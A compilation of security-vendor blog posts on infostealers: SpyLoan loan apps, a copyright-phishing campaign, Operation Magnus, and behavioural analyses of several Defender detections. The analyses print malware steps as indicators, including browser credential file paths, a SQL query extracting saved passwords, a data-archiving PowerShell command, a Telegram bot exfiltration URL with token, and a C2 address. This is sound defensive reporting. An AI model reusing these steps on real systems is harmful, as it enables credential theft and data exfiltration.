Although these permissions are justified as part of anti-fraud measures, in reality, they enable the malware to harvest data from the device. Once collected, the data is encrypted using AES-128 and sent to a command server. This encryption stage, although employing a pretty weak algorithm, makes it hard to parse the data transfer and recognize it as malicious.

Victims are lured into these apps with promises of fast and easy loans, targeting regions such as Mexico, Colombia, Thailand, and Tanzania. However, instead of providing legitimate financial services, users see high interest rates and huge penalties for payment delays.

Moreover, cybercriminals start threatening victims with time; threats involving their personal data and photos, most likely stolen through the SpyLoan functionality. This malicious cycle traps users in debt while violating their privacy. The malicious apps, targeting regions across South America, Africa, and Southeast Asia, include:

• Préstamo Seguro-Rápido, seguro
• RupiahKilat-Dana cair
• ÉcoPrêt Prêt En Ligne
• ยืมอย่างมีความสุข – เงินกู้
• Huayna Money – Préstamo Rápido

While some apps have been removed or modified to comply with Google Play policies, five of these are still available for download. I expect them to be gone pretty soon, too, but publishing new ones appears to be a rather simple task. Google should pay a lot of attention to its security mechanisms, to say the least. We have several older news articles about the malware in Play Store – consider checking them out.

How to Stay Safe?

The apps rely on a shared framework, suggesting a common developer or toolkit that cybercriminals use globally. By tailoring the user experience to local cultures and regulations, these apps effectively infiltrate diverse markets. However, SpyLoan is not a new threat; its operations date back to 2020, with previous reports revealing similar tactics and outcomes. I’ve written about this before.

To protect against threats like SpyLoan, you should carefully review app permissions, check the legitimacy of developers, and read app reviews. Additionally, users should avoid downloading apps promoted through unverified social media posts.

For advanced protection that will recognize even well-concealed threats, consider using GridinSoft Trojan Scanner. This free anti-malware program for Android provides all the necessary scanning and malware removal capabilities to keep your system safe.

The post SpyLoan Virus Found in Loan Apps on Google Play Store appeared first on Gridinsoft Blog.

Attack Overview

Since at least July 2024, this phishing attack targets Taiwanese Facebook business users by sending emails impersonating companies’ legal departments. These emails claim copyright infringement, pressuring users to download a fake PDF file allegedly containing infringement information.

This fake file, disguised as a PDF but actually an executable (.exe), bears file names in traditional Chinese like “Copyright Infringement Information” and “declare infringement,” directly aimed at traditional Chinese speakers. By impersonating known Taiwanese and Hong Kong companies, the attackers build credibility and exploit trust.

By trying to open the file, targeted users launched a loader module of Lumma Stealer, a rather new infostealer strain that emerged in early 2024. In some attack cases, it was coupled with Rhadamantys, another infostealer with similar functionality.

Phishing Mechanics

The emails warn that if users don’t remove “infringing content” within 24 hours, they could face legal actions. This urgency tactic, coupled with mentions of real company names, makes recipients feel compelled to click the links. Attackers swap out details like the company name and address to keep the email templates adaptable across different targets. Notably, this campaign even uses templates mimicking industrial and e-commerce companies, tailoring each for its target audience.

When a victim clicks the download link, it leads through a series of redirects—from Google’s Appspot.com (a hosting platform for web apps) to a short URL service and then to Dropbox, where the malware is hosted. This multi-step redirection, common in advanced phishing attacks, complicates detection by security systems, masking the final malicious download location. The malware file is password-protected, with a hidden EPS (Encapsulated PostScript) file inside, which loads once decrypted. This EPS file connects to Command-and-Control (C2) domains, signaling an ongoing campaign based on DNS records observed during analysis.

Types of Malware Used

Payloads delivered by the malicious pdf.exe files include two infostealers, LummaC2 and Rhadamanthys, known for their sophistication in stealing data. They are widely distributed on underground forums and target sensitive information like credentials, system data, cryptocurrency wallets, and browser-stored data. Let’s have a closer look at each one

LummaC2 Infostealer

This malware, written in C, steals information through obfuscation techniques to evade detection. When activated, it uses API functions like CreateFileMappingA and VirtualAllocate to inject its code directly into memory, bypassing standard file-based detection. We have an advanced post dedicated to this threat – go check it out.

But overall, this threat is currently a pinnacle of infostealer viruses, as it includes all the latest trends in malware development. Aside from this, malware masters also appear quite inventive in terms of spreading campaigns. They initially used YouTube promotions and Google Search ads as spreading channels, and did not stop seeking more and more unpredictable angles on unsuspecting users.

Rhadamanthys Infostealer

Emerging in 2022, this stealer targets extensive system data while utilizing the .rsrc section in its binary (typically reserved for icons and menus) to conceal malicious code. The loader modifies the registry to ensure that it executes every time the system starts, adding a layer of persistence. It even increases the file size to evade detection based on file signatures, a common antivirus defense technique.

The Rhadamanthys loader further complicates detection by injecting code into legitimate processes, such as “%Systemroot%\system32\dialer.exe”, making it appear as if a harmless system process is running. Mutex objects are employed to ensure only one instance of the malware is active, another common evasion method.

The post Fake Copyright Emails Spread Lumma, Rhadamantys Stealers appeared first on Gridinsoft Blog.

RedLine and META infostealer malware disrupted in Operation Magnus

Under the course of Operation Magnus, law enforcement agencies of 6 countries – US, Australia, Germany, UK, Belgium and Portugal, managed to take down Web infrastructure of infostealer viruses and arrest two individuals involved in malware operations. The information, along with a lot of details, comes from the official website of the operation, established swiftly after its finish.

The website features an interesting video, with the recordings of what they’ve managed to capture during the operation. Among other things are source codes of the malware, all access credentials for C2 panels, Telegram bot, and all the server infrastructure required to handle the malware users.

According to this exact video, law enforcement agencies apparently get their hands into the infrastructure much before disrupting the operations, and slipped in a forged update. This update, in turn, leaked all the important information of malware users (i.e. ones who bought the subscription and used it to spy on people). Such data will be quite handy for cyber police to find and detain the attackers.

And that is exactly what the promise to do, at least according to the video. It ends with the lines “Thank you for installing this update. We are looking forward to seeing you soon!”, with an icon of cuffed hands in the middle.

This operation in its core principles aligns with the tactic that law enforcement all around the planet opted for in their effort against cybercrime. Instead of chasing headmasters of malware operations, they disrupt infrastructure, collect all the available data and detain all the malware operators who come by. This tactic allowed disrupting operations, though temporarily, of even the toughest malware groups like QakBot and LockBit.

Two Hackers Arrested, 1200 Servers Taken Down

The overall network infrastructure of two malware families consisted of over 1200 servers, located in multiple countries around the world. Getting access to all of them was actually the reason for involving such a significant number of law enforcement agencies from different countries.

Key initiator of the campaign is Eurojust, who coordinated the effort in different parts of the world. Aside from disabling that huge amount of virtual servers, Netherland’s National Police managed to get 2 physical servers – a much more valuable asset in terms of pushing the investigation further.

In Belgium, Federal Police arrested two people accused of managing the network infrastructure. Their personalities as well as actual roles in malware operations are to be disclosed, but I guess they are far from being top management of the malware gang. It is well known that RedLine originated from Russia, and it is highly likely for META infostealer to be a similar story.

What are these infostealers?

RedLine and META viruses are both infostealers that target at collecting as much user information as possible. Online account credentials, session tokens, cookies, crypto wallet information – they pick everything they can reach to on the attacked machine, and then stay in to eavesdrop on possible other info.

Both malware samples are pretty widespread, with RedLine reaching over 50 infections daily. Though, this is far from its prime-time: back in the days, new infections appeared in hundreds per day. META lastly had higher volumes of infection recently, though due to its shorter activity span, there is not too much to say about its past.

Activity graph of META stealer

Activity graph of RedLine stealer

As Operation Magnus turned out, the viruses are pretty much the same in terms of codebase, exactly, META repeated the older RedLine infostealer. Such rebranding is a common practice among different malware families, especially when one of the developers leaves the project and decides to start over under a different name. Though, no such things were happening around RedLine recently, so there’s no clear understanding why this happened.

The post Operation Magnus Disrupts Infrasturcture of RedLine, META Stealers appeared first on Gridinsoft Blog.

Trojan:Win32/Stealer!MTB Overview

Trojan:Win32/Stealer!MTB is a generic Microsoft Defender detection that, as its name says, belongs to the infostealer malware type. In summary, this type of malware specializes in stealing information from the target system. Since the detection is generic, it can be applied to any infostealer, so I will describe them here in general terms and then go into more detail with a specific example.

As for the data that this malware can steal, any sensitive info stored on the system is at risk. Infostealer primarily steals login data stored in browsers (encrypted and unencrypted). In addition, it steals user/profile data of local email clients. Trojan Stealer is spreading in a variety of ways. But most often it spreads via compromised pirated software and as malicious email attachments.

Key Characteristics

Understanding the Name

• Trojan: Refers to malware that tricks users into loading and executing it on their systems.
• Win32: Indicates that it targets 32-bit Windows operating systems.
• Stealer: Specifies that the primary function is to steal data.
• !MTB: A specific identifier used by Microsoft to classify and track the threat.

Technical Analysis

Let’s now take a look at how Trojan Stealer behaves in an infected system, using one of the samples. Since this is a generic detection, a short time after detection its name will likely be changed to a more specific threat type. For simplicity, I have divided the entire process into several steps.

Initialization and Privilege Escalation

Like most malware, the first thing the stealer does is check to see if another instance of the malware is running. To do this, it runs an executable file and executes PowerShell commands:

%SAMPLEPATH%\3f7e041e466f779ea61696d2b932da57ce525fefe11972c8a7a489b1a2a9e38e.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Trojan Stealer then checks for special mutexes and if none are found, it creates them. Mutex is a special piece of code that prevents multiple instances of the program (or malware, in this case) from running on the system. So, if the malware has already been launched, it creates a special mutex. If not, the current instance does the following:

\Sessions\1\BaseNamedObjects\Global\RasPbFile
\Sessions\1\BaseNamedObjects\Global\SyncRootManager
\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex
\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex

To ensure that it is running on a live system and not a virtual environment, it performs the following check for system protection status.

HKCU\Software\Microsoft\Internet Explorer\Security
HKCU\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2102.4-0\X86\MsMpLics.dll

In this way, the malware checks the status of Microsoft Defender and tries to disable it. Next, the malware attempts to gain persistence in the system so that it can run on every system startup. To do this, it uses the legitimate schtasks.exe process and adds itself to autorun:

C:\Windows\System32\Tasks\Updates
C:\Windows\System32\Tasks\Updates\oobbtR

Payload and Data Collection

In the next step, the malware duplicates its files and configs to the AppData folder. This location is not normally visible to a user, hence there’s much less risk of the user raising an alarm or deleting the files. Typically for malicious programs, the file names are obscure and unintelligible.

%USERPROFILE%\AppData\Local\Temp\__PSScriptPolicyTest_dhhkkyeh.5dh.ps1
%USERPROFILE%\AppData\Local\Temp\__PSScriptPolicyTest_ypq04irl.mrv.psm1
%USERPROFILE%\AppData\Local\Temp\tmp8901.tmp
%USERPROFILE%\AppData\Roaming\oobbtR.exe
%USERPROFILE%\AppData\Local\Temp\tmpF5CB.tmp

Next, the threat performs its main task, which is to collect data. In summary, it checks installed browsers, email clients, and other places on the system that may contain login credentials. To elaborate, these are the following locations:

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Microsoft\Credentials\
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
C:\Users\user\AppData\Roaming\Comodo\IceDragon\profiles.ini
C:\Users\user\AppData\Roaming\Flock\Browser\profiles.ini
C:\Users\user\AppData\Roaming\K-Meleon\profiles.ini C:\Users\user\AppData\Roaming\Microsoft\Credentials\
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\user\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
C:\Users\user\AppData\Roaming\Postbox\profiles.ini
C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
C:\Users\user\AppData\Roaming\Waterfox\profiles.ini

The malware compresses all collected data into an archive and saves it in a temporary folder. This way, it will be impossible to detect the data transfer, as the file simply mixes up with the rest of network traffic. But to avoid detection of abnormal package transfer from security software, the malware also uses encrypted connections when it comes to communications with the command server.

Data Exfiltration

The last step in the malware cycle is to send the collected data to the attacker’s command and control (C2) server. But before all that, the malware checks the external IP address of the system through the api.ipify.org service. It’s probably needed to add to a system fingerprint, the set of data that distinguishes one infected system from another. The malware uses Telegram as a command server, specifically calling for a part of Telegram API to send messages via URLs.

https://api.telegram.org/bot5693068931:AAGSQSNIWDJM1FzeZVNHS020I9wVBrQdkRM/sendMessage

On the hacker’s side, this looks like a conversation with a bot that regularly sends back the logs from victim PCs. It is now a rather popular practice to use Telegram as a C2 server, though the exact model of how this works may change after the recent events around the messenger.

How To Remove Trojan:Win32/Stealer!MTB?

To get rid of the Stealer, the best option will be performing an anti-malware scan. Gridinsoft Anti-Malware will be an optimal solution for that task: its multi-component detection system will swiftly delete any malicious elements, regardless of their origin. Below, you can see the detailed guide on how to perform the scanning and remove the threats afterwards.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Stealer!MTB Virus appeared first on Gridinsoft Blog.

Trojan:Win32/Commandrob.A!ml Overview

Trojan:Win32/Commandrob.A!ml is an AI-based detection of Microsoft Defender. This detection is triggered by behaviors typical of spyware or backdoors that access network resources. Since the detection relies on machine learning (indicated by the “!ml” suffix), it may be a false positive. This happens because the detection focuses on program behavior and network communication patterns instead of traditional signature-based analysis.

This creates a significant uncertainty for users who see this detection. Even legitimate programs can be detected, but at the same time, that does not guarantee that one sees a false positive. There are quite a lot of details to go through to understand whether this detection carries any danger for your system, so let’s have a more detailed look at what exactly is detected.

Technical Analysis

As mentioned earlier, Trojan:Win32/Commandrob.A!ml is a behavior-based heuristic detection. In particular, users report about it flagging a PowerShell script used for specific network operations. Calls used in these scripts can indeed be attributed to backdoors or spyware: they typically query the system’s IP address to detect system location. Malware needs this info to avoid running certain countries and communicate with command servers. In particular, the following command is almost guaranteed to cause the detection:

(Invoke-WebRequest -uri http://ipinfo.io/ip -UseBasicParsing).Content

This request queries the external IP address of the host system by invoking the “ipinfo.io” service, which returns the IP address in plaintext. The -UseBasicParsing option streamlines web response parsing, making it faster and less reliant on Internet Explorer’s full HTML parsing, which older PowerShell versions may use by default. The “Content” property retrieves the HTTP response body, which in this case contains the external IP address of the system.

Such behavior, as I’ve mentioned, is pretty typical for spyware and backdoors, though can be found in other malware types. Anyways, malware uses this information to create a system fingerprint, and sometimes stop further execution if the detected location is in the ban list. Though, if the Trojan:Win32/Commandrob.A!ml is a real detection, you won’t see all the commands and arguments like that, in plain text, as it would be extremely easy to detect. Malicious programs employ encoding to avoid this, making the command unintelligible.

The effects of the Trojan:Win32/Commandrob.A!ml (if it is a real malware) are less than pleasant. Regardless of the exact type, the virus will likely gather all the login credentials present in the system, and provide remote access for the hacker. You may not notice that instantly, but in about a week, the hackers will make use of the leaked passwords and hijack the corresponding accounts. Aside from the dirty job with passwords, it will likely disable security measures of the system, making it vulnerable to further malware attacks.

Is Trojan:Win32/Commandrob.A!ml False Positive?

There is a high probability of Trojan:Win32/Commandrob.A!ml being a false positive detection. Since the detection is triggered by network communications via PowerShell, legitimate programs often use similar commands to carry out routine tasks. Examples include software updates or network status checks – a thing present in a lot of modern software.

One specific example comes from the Peugeot community forum, where the user reported this detection flagging the new firmware for the on-board computer of a Peugeot car. As they’ve sourced the firmware from the official website, chances of it being a real detection are, obviously, extremely low. All that users can do in such situations is to add the corresponding file to the Ignore List, so Microsoft Defender won’t touch them.

Overall, if you see the Trojan:Win32/Commandrob.A!ml detection popping up to a safe and legitimate program, it will be OK to just ignore and whitelist it. Microsoft typically updates its detection databases every day, so the fixed version will likely appear in a day or two. At the same time, it may at times be difficult to make a decision, especially when the Defender flags a PowerShell instance or a random file, not a specific program.

How to Remove Trojan:Win32/Commandrob.A!ml?

To scan the system and remove the potential Trojan:Win32/Commandrob.A!ml malware, I recommend using GridinSoft Anti-Malware. It will give you the second opinion on whether there is anything malicious going on in your system, and remove the threats in just a few clicks. A Full scan will fit the need, scanning even the most remote parts of the system. The program will also help with stopping threats like Trojan:Win32/Commandrob.A!ml in future.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Commandrob.A!ml Threat Analysis appeared first on Gridinsoft Blog.

Trojan:Win64/Zusy.CZ!MTB Overview

Trojan:Win64/Zusy.CZ!MTB is a Microsoft Defender heuristic detection that is categorized as an info stealer or spyware. Although the detection name includes “Zusy”, it is unlikely that this threat is directly related to the Zusy, aka Tinba (Tiny Banker) banking trojan. Instead, this is more about similarities in behavior, rather than the specific threat.

Typically, malware detected with this name steals sensitive data from the system, messengers, and browsers. In addition to these functions, some samples of Zusy.CZ!MTB can act as a malware dropper. It can dynamically load necessary modules, enabling it to load essential Windows functions (e.g., API functions) directly at code execution, bypassing static binding at the compilation stage. In simple words – it can circumvent security mechanisms and run malware without any obstacles.

Technical Analysis

Let’s take a closer look at how Trojan:Win64/Zusy.CZ!MTB behaves on the system. The first action the malware takes is to check for any existing copies running on the system. To achieve this, it searches for and reads several mutexes. If no other copies are found, the malware creates the following mutex:

Global\SyncRootManager
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
cversions.3.m

Further, it creates a selection of processes using calls to SVCHost, a legit Windows system process. That way, malware provides itself with high privileges, and also manages to go below the radar of security systems.

%windir%\System32\svchost.exe -k WerSvcGroup
%CONHOST% "745317126-1829192619145923398189172921-1227097410-10282899566139682-372746664
%CONHOST% "-1075281491-1761242975-14846433691718005387762123978-115817497120033444571637710908

After loading what looks like some of its modules, Trojan:Win64/Zusy.CZ!MTB proceeds with checking the system for being a virtualized environment of any sort. That is a rather typical check for almost any malware sample these days, and it will cease any further execution shall the system have any signs of artificiality.

HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe.Config
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

Preparation steps continue with checks of security software. With the call to services.exe the virus enumerates active services, seeking for ones that are specific to antivirus software. It will alter its behavior if one or several matches are present. Further checks review the configurations of Microsoft Defender.

C:\Windows\system32\services.exe
C:\Windows\system32\SecurityHealthService.exe
C:\Program Files\Windows Defender\MpClient.dll
C:\Program Files\Windows Defender\MpOAV.dll
C:\Program Files\Windows Defender\MsMpLics.dll

Gathering System Information and Establishing Persistence

The next step involves creating a system fingerprint and collecting basic information. That is not yet about stealing personal information: malware needs just basic stats of the system for the command server to distinguish it from others. To do this, the malware launches several other processes:

wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
C:\Windows\System32\netsh.exe netsh wlan show profiles

While these are legitimate Windows tools, the malware employs them to forcibly update system information.

To gain additional persistence, malware edits a selection of registry keys, mainly responsible for networking and program properties. Specifically, the malware installs a proxy server to control traffic on the target system and sets the value to 1 (enabled), indicating its ability to control the Internet connection. The reason for the edits to InstalledWin32AppsRevision key are not clear, but it may serve to track changes in program configurations.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\InstalledWin32AppsRevision
HKEY_USERS\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_USERS\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer

C2 Connection

After gathering the system fingerprint, the malware contacts the command and control server at 185.215.113.32/yandex/index.php, transmits the collected information, and awaits further instructions. Typically for the majority of samples, those instructions consist of what files and data should the virus search for.

Collecting sensitive data

Upon receiving the configuration file, Trojan:Win64/Zusy.CZ!MTB starts its main course of action: collecting sensitive data. To achieve this, it exploits rundll32.exe, a legitimate process to run the following command from a temporary folder:

"C:\Windows\System32\rundll32.exe" C:\Users\A4148~1.MON\AppData\Local\Temp\d6feff0c199f425b6ae4ebf34630939d.exe.dll,DllMain
kernel32.CreateSemaphoreW

Following this, it goes through folders that contain browser data, particularly going for things that can carry information about user accounts, login credentials and so on. Alongside browser data, the malware also collects user information from several Windows folders.

C:\Program Files (x86)\Google\GoogleUpdater\130.0.6679.0\.purple\accounts.xml
C:\Program Files\Google\Chrome\Application\chrome.VisualElementsManifest.xml
C:\Program Files\Internet Explorer\.purple\accounts.xml
C:\Program Files\Mozilla Firefox\.purple\accounts.xml
C:\Program Files\Mozilla Firefox\TorBrowser\Data\Browser\profile.default
C:\Program Files\Mozilla Thunderbird\Thunderbird.exe
C:\Users\\AppData\Local\Tor Browser\Browser\TorBrowser\Data\Browser\profile.default\logins.json
C:\Users\\AppData\Local\CentBrowser\User Data\Default\Login Data
C:\Users\\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\\AppData\Local\Chromium\User Data\Default\Login Data-journal
C:\Users\\AppData\Local\Chromium\User Data\Default\Login Data-wal
C:\Users\\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\\AppData\Roaming\.purple\accounts.xml
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\.purple\accounts.xml

Data Exfiltration

Once the malware completes the data collection, it compresses the information into an archive saved in a temporary folder, using a corresponding PowerShell command:

powershell -Command Compress-Archive -Path '%TEMP%\_Files_\' -DestinationPath '%TEMP%\758232323065_Desktop.zip' -CompressionLevel Optimal
rundll32.exe %SAMPLEPATH%,Save

The final step involves uploading the archive to the attacker’s server. As the malware uses HTTP connection for this, it could have been possible to intercept the package and discover that the malware attack is going on. However, the previous step of compressing the files into an archive makes it a much more complicated endeavor.

POST http://185.215.113.32/yandex/index.php 200

Can Trojan:Win64/Zusy.CZ!MTB be a false positive?

Yes, Trojan:Win64/Zusy.CZ!MTB can indeed be a false positive. For instance, some Reddit users reported that Defender unexpectedly detected Zusy trojan upon starting their PCs, particularly in some non-threatening log files. At times, this detection was linked to outdated Chromium files. It is also possible to see this detection flagging own-made programs, especially if they have certain networking capabilities.

Given that this is a heuristic detection, such occurrences are not surprising. Updating either detection databases of Microsoft Defender should be enough in that case; when Chromium is detected, a browser update should fix the issue. The rest of the cases, well, they can continue for quite some time, unless you report the false positive to Microsoft themselves. But it is worth noting that figuring out whether the detection is false on your own is not always a good idea.

How To Remove Trojan:Win64/Zusy.CZ!MTB?

If you encounter Trojan:Win64/Zusy.CZ!MTB and suspect it is not a false positive, it’s advisable to conduct a full system scan. For this, it is best to use an advanced anti-malware software such as GridinSoft Anti-Malware. Just follow the instructions below to clean your system from Trojan:Win64/Zusy.CZ!MTB and other potential threats from your system.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win64/Zusy.CZ!MTB appeared first on Gridinsoft Blog.

Win64/Reflo.HNS!MTB Overview

Trojan:Win64/Reflo.HNS!MTB is a heuristic detection used by Microsoft Defender to detect a specific type of malware. This malware is a type of spyware and can actively collect sensitive information, such as user credentials, from the victim’s system. Heuristic detection is used when malware has certain characteristics and behavioral patterns that match known threats, but it may not have a matching signature in the antivirus database.

After the execution, Reflo Trojan will start its malicious activity immediately, with the primary goal of stealing confidential information. This can end up with your social media accounts to start sending spam messages, and banking accounts being drained. This type of malware is designed to operate stealthily, so its presence is usually difficult to detect. In most cases, the victim only discovers it when significant damage has already been done, such as aforementioned unauthorized access to online accounts.

As with most similar threats, Trojan:Win64/Reflo.HNS!MTB is often spread via pirated software. Repackers, modders, and websites that distribute pirated games, cracked programs, or mods may add it as a hidden addition to their repacks. It can also spread through email attachments, malicious links, or accidental downloads on compromised websites. However, the main source of this threat is questionable game mods.

Technical Analysis

Now let’s see how this malware behaves on a compromised system. As mentioned earlier, this virus is mainly distributed via game mods. This suggests that any detections might be false positives by default. Although the user won’t notice anything visually, clicking “allow” triggers certain processes in the system.

The process begins with the following command:

"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && start /wait ^"^" ^"C:\Users\\AppData\Local\Temp\Appname/Setup.bat^"
C:\Windows\system32\cmd.exe /K "C:\Users\\AppData\Local\Temp\Appname/Setup.bat
python Setup.py

Next, the malware checks for the presence of a sandbox or virtual environment and fingerprints the system. To do this, it checks the following registry keys:

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName

This is a standard procedure for malware that prevents the threat from running in a virtual environment. In addition, Trojan:Win64/Reflo.HNS!MTB uses some tricks to prevent dynamic analysis.

Payload

The following commands are used by the Reflo Trojan to drop and unpack the payload:

"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\RedTiger-Tools-main.zip"
7620 - C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\cjov35ys.mq0" "C:\Users\user\Desktop\Appname.zip"
7660 - C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

The malware drops many files into the Windows temporary directory C:\Users\user\AppData\Local\Temp\, including many “.py” files that are necessary for the malware to work.

Credential Access

The next step is to collect confidential information. This is done by creating a DirectInput object that enables the malware to read keystrokes. In this way, attackers can intercept usernames and passwords that the victim enters on their device. Once the user authorizes the execution of this threat, it can run in the background for an extended period. The malware is extremely stealthy, and the name of the executable can be random. Therefore, the user is unlikely to realize why they can no longer log into their account.

Besides keylogging, the hijacker also collects confidential data already stored on the system. Among other things, the malware can collect cookies, saved passwords, and credit card information from autocomplete forms in popular browsers. Even though the latest versions of browsers encrypt this information in encrypted form, it does not protect it completely. The malware can also collect cookies, saved passwords, and credit card information from autocomplete forms in popular browsers. Typically, the query looks like this:

SELECT action_url, username_value, password_value FROM logins

Almost always, infostealer malware like Reflo.HNS!MTB targets the most popular web browsers. Chrome, Chromium, Opera, Firefox and some of the popular alternatives to the mainstream applications are among the target list. Still, using the no-name browser won’t always secure you: malware masters can easily adjust the list of applications their virus will extract credentials from.

C2 Connection

The malware communicates with multiple addresses on the internet, but certain addresses are of particular interest. Specifically, it attempts to connect to .onion addresses, which are associated with the Darknet. Our instance is trying to connect to:

3bp7szl6ehbrnitmbyxzvcm3ieu7ba2kys64oecf4g2b65mcgbafzgqd.onion
55niksbd22qqaedkw36qw4cpofmbxdtbwonxam7ov2ga62zqbhgty3yd.onion
7mejofwihleuugda5kfnr7tupvfbaqntjqnfxc4hwmozlcmj2cey3hqd.onion
ajlu6mrc7lwulwakojrgvvtarotvkvxqosb4psxljgobjhureve4kdqd.onion

These are just a few of the addresses, but in addition to darknet sites, the malware tries to connect to URLs related to Discord, Telegram, Mastodon or similar social networks. That tactic allows frauds to mask the final command servers, as the corresponding user profiles will contain nothing but the link to the “main” C2.

How To Remove Trojan:Win64/Reflo.HNS!MTB?

To remove Trojan:Win64/Reflo.HNS!MTB, it’s essential to use an advanced anti-malware solution. I recommend GridinSoft Anti-Malware, as it can offer permanent protection against most threats in addition to cleaning. The first step is to scan your system and remove all detected threats. To do this, follow the instructions below:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

After removing the threats, be sure to change your account passwords and terminate any suspicious sessions. This step is crucial to prevent attackers from regaining access to compromised accounts.

The post Trojan:Win64/Reflo.HNS!MTB appeared first on Gridinsoft Blog.

Trojan:Win32/Bearfoos.B!ml Overview

Trojan:Win32/Bearfoos.B!ml is a detection of Microsoft Defender AI system for infostealer malware and spyware. Typically, the malware this detection flags belongs to a broader family, but may as well mean a small-batch virus. Reason for the detection is a specific behavior pattern that the AI system has spotted, which means it is not really clear what exactly caused it. Bearfoos embeds itself deeply into the system, often unnoticed by the user. It targets cookies, password databases, cryptocurrency wallets, and other sensitive information stored on the infected system.

Once the data is collected, the malware transmits it to a command-and-control server, then enters a dormant state, waiting for further commands. This allows it to remain undetected for extended periods. In addition to data theft, Bearfoos can log keystrokes, take screenshots, record video or audio using the system’s peripherals, and perform other spying activities.

Trojan:Win32/Bearfoos.B!ml spreads using methods typical for this type of malware. Most commonly, it is distributed through game cheats, mods, and dubious utilities. The second most common method of distribution is email spam.

Technical Analysis

Let’s break down how Trojan:Win32/Bearfoos.B!ml behaves in an infected system. The particular sample that I review appears to be an offshoot of AgentTesla spyware. I’ll try to explain the most important aspects of this threat as clearly as possible.

Upon infiltrating the system, the malware performs checks in the following locations for the presence of sandboxes and debuggers. This is a typical step that malware does to avoid analysis and “useless” infections.

C:\drivers\etc\hosts
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\system32\VERSION.dll

Gaining Persistence

After that, it drops its own copy to the AppData/Roaming folder and assigns it a random name. In my case, it was vzCravLx.exe. Next, the malware checks Microsoft Defender settings:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
